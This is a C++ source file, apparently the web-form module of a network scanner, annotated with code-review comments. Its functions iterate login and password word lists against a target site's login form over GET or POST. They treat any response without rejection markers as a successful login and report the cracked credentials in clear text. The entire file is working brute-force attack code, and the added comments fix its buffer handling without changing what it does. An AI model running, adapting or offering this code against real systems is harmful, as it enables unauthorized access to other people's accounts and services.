# include "WebformWorker.h"
# include "FileUpdater.h"
/**
 * Classifies the response to one web-form login attempt.
 *
 * The verdict is a heuristic, not a protocol check: the attempt is reported
 * as accepted only when the body is non-empty and contains neither `formVal`
 * nor any entry of the marker list below (case-insensitive search via
 * Utils::ci_find_substr). Any response that merely lacks those substrings is
 * therefore reported as a hit, so false positives are possible.
 *
 * On a reported hit the pair is written in clear text to the UI channel
 * (doEmition_BAGreenData) and copied into the returned record.
 *
 * NOTE(review): string literals are reproduced exactly as they appear on the
 * page, including the padding spaces inside the quotes; that padding may be
 * an extraction artifact -- verify against the repository copy.
 *
 * @param ip      Host string, used only for reporting here.
 * @param port    Port number, used only for reporting here.
 * @param buffer  Response text to inspect; must not be NULL (dereferenced).
 * @param formVal Substring whose presence counts as "still on the form".
 * @param login   Login that was submitted.
 * @param pass    Password that was submitted.
 * @return A record that keeps its initial " UNKNOWN " state unless the
 *         attempt is reported as accepted, in which case login/pass are set.
 */
lopaStr WFClass::parseResponse(const char *ip,
                               const int port,
                               const std::string *buffer,
                               const char *formVal,
                               const char *login,
                               const char *pass) {
    lopaStr result = {" UNKNOWN ", " ", " "};

    // An empty body carries no evidence either way.
    if (buffer->size() == 0) {
        return result;
    }

    // Substrings whose presence is treated as "attempt not accepted".
    // Order matches the original condition chain.
    static const char *const rejectionMarkers[] = {
        " denied ",
        " Location: ",
        " Authentication required ",
        " invalid ",
        " err ",
        " .href ",
        " .replace ",
        " .location ",
        " 501 not implemented ",
        " http-equiv ",
        " busy ",
        " later ",
        " forbidden "
    };
    const size_t markerCount = sizeof rejectionMarkers / sizeof rejectionMarkers[0];

    // formVal is tested first, then the fixed markers; stop at the first match.
    bool markerSeen = Utils::ci_find_substr(*buffer, std::string(formVal)) != -1;
    for (size_t k = 0; !markerSeen && k < markerCount; ++k) {
        markerSeen = Utils::ci_find_substr(*buffer, std::string(rejectionMarkers[k])) != -1;
    }

    const QString hostPort = QString(ip) + " : " + QString::number(port);

    if (!markerSeen) {
        stt->doEmition_BAGreenData(" [+] " + hostPort + " - WF pass: " +
                                   QString(login) + " : " + QString(pass));
        // NOTE(review): unbounded copies; the field sizes of lopaStr are not
        // visible here -- confirm they can hold the caller's buffers.
        strcpy(result.login, login);
        strcpy(result.pass, pass);
        return result;
    }

    // Rejected: surface two specific server answers in the UI, then fall
    // through with the untouched " UNKNOWN " record.
    const QString hostLink = " <a href= \" http:// " + hostPort +
                             " \" ><font color= \" #c3c3c3 \" > " + hostPort;
    if (Utils::ci_find_substr(*buffer, std::string(" 501 not implemented ")) != -1) {
        stt->doEmitionRedFoundData(hostLink + " </font></a> - [WF]: 501 Not Implemented. ");
    }
    if (Utils::ci_find_substr(*buffer, std::string(" 404 not found ")) != -1) {
        stt->doEmitionRedFoundData(hostLink + " </font></a> - [WF]: 404 Not Found. ");
    }
    return result;
}
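/**
 * Iterates the configured login and password lists against a web form using
 * GET requests and returns the verdict of the last response that was parsed.
 *
 * Each attempt is a separate request whose URL carries the candidate pair in
 * the query string, so on the receiving side every attempt is typically
 * visible in ordinary access logs as a burst of requests to one action URL.
 *
 * Memory-safety changes in this version (the iteration logic is untouched):
 *  - word-list entries are copied with an explicit bound into login[128] and
 *    pass[32] (over-long entries are truncated instead of overflowing);
 *  - the request-size guard now counts the literal bytes of the format string
 *    and the terminating NUL, so a request of exactly the buffer size is
 *    rejected instead of writing past nip[256].
 *
 * NOTE(review): string literals are reproduced exactly as they appear on the
 * page, including the padding spaces inside the quotes; that padding may be
 * an extraction artifact -- verify against the repository copy.
 * NOTE(review): `result` is overwritten on every attempt and the loop does
 * not stop on a reported hit; `if (i == 0) ++i;` advances the outer index
 * from inside the inner loop. Both are kept as found -- confirm intent.
 *
 * @param ip        Host part of the request target.
 * @param port      Port passed to Connector::nConnect.
 * @param actionVal Form action path appended to `ip`.
 * @param userVal   Name of the login field.
 * @param passVal   Name of the password field.
 * @param formVal   Substring handed to parseResponse.
 * @return Record from the last parsed response, or the " UNKNOWN " record
 *         when the request does not fit or the connection fails first.
 */
lopaStr WFClass::doGetCheck(const char *ip,
                            int port,
                            char *actionVal,
                            char *userVal,
                            char *passVal,
                            char *formVal) {
    lopaStr result = {" UNKNOWN ", " ", " "};
    int passCounter = 0;
    int firstCycle = 0;
    char login[128] = {0};
    char pass[32] = {0};

    // One definition of the format so the size guard and sprintf() agree.
    static const char requestFormat[] = " %s%s?%s=%s&%s=%s ";
    // Bytes emitted literally: the format minus its six two-character "%s".
    const size_t literalBytes = sizeof requestFormat - 1 - 6 * 2;

    for (int i = 0; i < MaxWFLogin; ++i) {
        if (!globalScanFlag) break;
        // Bounded copy: strncpy does not terminate on truncation, so do it here.
        strncpy(login, wfLoginLst[i], sizeof login - 1);
        login[sizeof login - 1] = '\0';

        for (int j = firstCycle; j < MaxWFPass; ++j) {
            if (!globalScanFlag) break;
            strncpy(pass, wfPassLst[j], sizeof pass - 1);
            pass[sizeof pass - 1] = '\0';

            char nip[256] = {0};
            // Exact space sprintf() will need, including the terminating NUL.
            const size_t needed = strlen(ip) + strlen(actionVal) + strlen(userVal) +
                                  strlen(login) + strlen(passVal) + strlen(pass) +
                                  literalBytes + 1;
            if (needed > sizeof nip) {
                stt->doEmitionRedFoundData(" [WF] Wrong request size! ( " + QString(ip) +
                                           " : " + QString::number(port) + " ) ");
                return result;
            }
            sprintf(nip, requestFormat, ip, actionVal, userVal, login, passVal, pass);

            std::string buffer;
            if (Connector::nConnect(nip, port, &buffer) <= 0) return result;

            // passCounter only advances when this log line is enabled.
            if (BALogSwitched) stt->doEmitionBAData(" Checked WF: " + QString(ip) + " : " + QString::number(port) +
                                                    " ; login/pass: " + QString(login) + " : " + QString(pass) +
                                                    " ; - Progress: ( " +
                                                    QString::number((passCounter++ / (double)(MaxWFPass * MaxWFLogin)) * 100).mid(0, 4) + " %) ");

            result = parseResponse(ip, port, &buffer, formVal, login, pass);
            if (i == 0) ++i;
        }
        firstCycle = 1;
    }
    return result;
}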
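/**
 * POST counterpart of doGetCheck: builds the target from `ip` + `actionVal`,
 * sends the candidate pair as a form body and classifies the response.
 *
 * As written, every path through the inner loop body returns (size guard,
 * connection failure, or the parseResponse verdict), so at most one request
 * is sent per call even though the code is shaped as two nested loops.
 *
 * Changes in this version (request behaviour is otherwise untouched):
 *  - word-list entries are copied with an explicit bound into login[128] and
 *    pass[32] (over-long entries are truncated instead of overflowing);
 *  - in addition to the original combined-size guard, each sprintf() target
 *    is checked against its own buffer, counting the format's literal bytes
 *    and the terminating NUL;
 *  - the unreachable `if (i == 0) ++i;` after the return was removed.
 *
 * NOTE(review): string literals are reproduced exactly as they appear on the
 * page, including the padding spaces inside the quotes; that padding may be
 * an extraction artifact -- verify against the repository copy.
 *
 * @param ip        Host part of the request target.
 * @param port      Port passed to Connector::nConnect.
 * @param actionVal Form action path appended to `ip`.
 * @param userVal   Name of the login field.
 * @param passVal   Name of the password field.
 * @param formVal   Substring handed to parseResponse.
 * @return The parseResponse verdict for the first response received, or the
 *         " UNKNOWN " record when the request does not fit, the connection
 *         fails, or no attempt is made.
 */
lopaStr WFClass::doPostCheck(const char *ip,
                             int port,
                             char *actionVal,
                             char *userVal,
                             char *passVal,
                             char *formVal) {
    lopaStr result = {" UNKNOWN ", " ", " "};
    int passCounter = 0;
    int firstCycle = 0;
    char login[128] = {0};
    char pass[32] = {0};

    // One definition per format so the size guards and sprintf() agree.
    static const char urlFormat[] = " %s%s ";
    static const char bodyFormat[] = " %s=%s&%s=%s ";
    // Bytes emitted literally: each format minus its two-character "%s" items.
    const size_t urlLiteralBytes = sizeof urlFormat - 1 - 2 * 2;
    const size_t bodyLiteralBytes = sizeof bodyFormat - 1 - 4 * 2;

    for (int i = 0; i < MaxWFLogin; ++i) {
        if (!globalScanFlag) break;
        // Bounded copy: strncpy does not terminate on truncation, so do it here.
        strncpy(login, wfLoginLst[i], sizeof login - 1);
        login[sizeof login - 1] = '\0';

        for (int j = firstCycle; j < MaxWFPass; ++j) {
            if (!globalScanFlag) break;
            strncpy(pass, wfPassLst[j], sizeof pass - 1);
            pass[sizeof pass - 1] = '\0';

            char nip[256] = {0};
            char postData[256] = {0};

            // Original combined guard, kept so nothing previously rejected is now sent.
            int rSize = strlen(ip) + strlen(actionVal) + strlen(userVal) + strlen(login) + strlen(passVal) + strlen(pass) + 4;
            // Per-buffer guards: exact space each sprintf() needs, NUL included.
            const size_t urlNeeded = strlen(ip) + strlen(actionVal) + urlLiteralBytes + 1;
            const size_t bodyNeeded = strlen(userVal) + strlen(login) + strlen(passVal) +
                                      strlen(pass) + bodyLiteralBytes + 1;
            if (rSize > 256 || urlNeeded > sizeof nip || bodyNeeded > sizeof postData) {
                stt->doEmitionRedFoundData(" [WF] Wrong request size! ( " + QString(ip) +
                                           " : " + QString::number(port) + " ) ");
                return result;
            }
            sprintf(nip, urlFormat, ip, actionVal);
            sprintf(postData, bodyFormat, userVal, login, passVal, pass);

            std::string buffer;
            if (Connector::nConnect(nip, port, &buffer, postData) <= 0) return result;

            if (BALogSwitched) stt->doEmitionBAData(" Checked WF: " + QString(ip) + " : " + QString::number(port) + " ; login/pass: " +
                                                    QString(login) + " : " + QString(pass) + " ; - Progress: ( " +
                                                    QString::number((passCounter / (double)(MaxWFPass * MaxWFLogin)) * 100).mid(0, 4) + " %) ");

            ++passCounter;
            return parseResponse(ip, port, &buffer, formVal, login, pass);
        }
        firstCycle = 1;
    }
    return result;
}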
/**
 * Entry point for the web-form check: picks the GET or POST routine from the
 * form's method string and returns that routine's record.
 *
 * The method is matched by substring via strstri (presumably
 * case-insensitive -- helper not visible here), with the GET marker tested
 * first, so a value containing both markers takes the GET path. Any other
 * value is reported to the UI as an unknown method and the initial
 * " UNKNOWN " record is returned.
 *
 * NOTE(review): string literals are reproduced exactly as they appear on the
 * page, including the padding spaces inside the quotes; that padding may be
 * an extraction artifact -- verify against the repository copy.
 *
 * @param ip        Host part of the request target.
 * @param port      Target port.
 * @param methodVal Form method string used to choose the routine.
 * @param actionVal Form action path.
 * @param userVal   Name of the login field.
 * @param passVal   Name of the password field.
 * @param formVal   Substring handed on to the response classifier.
 * @return Record produced by the chosen routine, or " UNKNOWN " if none ran.
 */
lopaStr WFClass::_WFBrute(const char *ip,
                          int port,
                          char *methodVal,
                          char *actionVal,
                          char *userVal,
                          char *passVal,
                          char *formVal) {
    if (strstri(methodVal, " get ") != NULL) {
        return doGetCheck(ip, port, actionVal, userVal, passVal, formVal);
    }

    if (strstri(methodVal, " post ") != NULL) {
        return doPostCheck(ip, port, actionVal, userVal, passVal, formVal);
    }

    // Neither marker present: report the host in the UI and return the
    // default record.
    const QString hostPort = QString(ip) + " : " + QString::number(port);
    stt->doEmitionFoundData(" <a href= \" http:// " + hostPort +
                            " \" ><font color= \" #c3c3c3 \" > " + hostPort +
                            " </font></a> - [WF]: Unknown method. ");

    lopaStr fallback = {" UNKNOWN ", " ", " "};
    return fallback;
}